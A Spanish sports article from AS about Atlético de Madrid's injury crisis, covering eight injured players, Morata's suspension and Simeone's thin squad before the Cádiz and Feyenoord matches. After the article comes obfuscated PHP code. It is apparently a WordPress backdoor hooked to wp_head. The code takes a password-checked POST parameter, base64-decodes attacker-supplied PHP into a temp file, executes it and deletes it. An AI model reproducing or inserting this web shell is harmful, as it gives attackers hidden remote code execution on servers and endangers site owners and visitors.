El puzle atlético se queda sin piezas

El equipo tiene dos días para recuperar a alguno de los ocho lesionados (Reinildo, Savic, Söyüncü, Lemar, Barrios, De Paul, Memphis y Correa). Y Morata, expulsado en Pamplona, es la novena baja.

El Atlético se volvió de Pamplona con tres puntos sufridos hasta la extenuación y con otra baja más. La novena. De 23 futbolistas, a Simeone le quedan solo 14 y este domingo (21:00) el equipo afronta su quinto encuentro en apenas 15 días. “Necesitamos descansar desde ya”, dijo y repitió el técnico en El Sadar. A los ocho ausentes por lesión en la casa de Osasuna se les une Morata, este por su expulsión de los últimos minutos. Y el Cholo pone en la mesa las escasas piezas de su puzle, porque se ve con apuros para armar el once, ahora especialmente la delantera.

Uno no juegan, otros no paran

Así, una semana con dos triunfos importantísimos ante Real Madrid y Osasuna tiene un regusto agridulce porque ha perdido por lesión a Correa, Memphis y Savic. Y para el derbi ya faltaron Reinildo, Söyüncü, Lemar, De Paul y Pablo Barrios. El peligro es que, ante tanta ausencia, los futbolistas aptos no paran de sumar minutos: Morata ha jugado 345 minutos de los 360 totales de después del parón; Griezmann, 331; Llorente, 336; Saúl, 299; Hermoso, 331; Lino, 254 en los tres últimos… Si ya el calendario está cargado, la acumulación de tiempo jugado por no poder rotar aumenta el riesgo de que alguno más caiga.

Salvo recurso con efecto por parte del club, Morata descansará ante el Cádiz por sanción. Y salvo recuperación exprés de Memphis o Correa, el ataque se queda romo para la cita del domingo. Griezmann parte como el único disponible del cuarteto, pero su rol está cada vez más lejos del de ser el ariete del equipo. Asoman más opciones. Riquelme, con el 0-2, se postula. “Es una buena propuesta”, comentó Simeone al respecto. También puede ser Llorente el delantero, como ya lo fue en varias ocasiones en 2020. O tirar del B, Niño o Abde, alternativa poco probable.

Asoma la Champions

El efecto dominó provoca que, si un medio avanza al ataque, el centro del campo se queda cogido con alfileres. Koke aún está despegando tras un mes parado por lesión y ante Osasuna acabó fundido y Saúl es fijo a su izquierda. A la espera de De Paul, solo quedan los citados Riquelme y Llorente, salvo que Witsel se ponga de 5. Si esto pasa, para la defensa también habrá lo justo: Azpilicueta, Giménez y Hermoso.

La alineación no tiene mucho margen de maniobra. Del partido contra la Lazio al derbi, Simeone hizo dos cambios, uno obligado por la lesión de Barrios; del Madrid al del El Sadar, una variación, la del lesionado Savic; para el domingo, con solo 12 jugadores de campo, tendrán que repetir 8 o 9. Y el miércoles, llega el Feyenoord al Metropolitano, examen clave en Champions. El calendario exige y al Atleti cada semana le está saliendo carísima…

AS

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}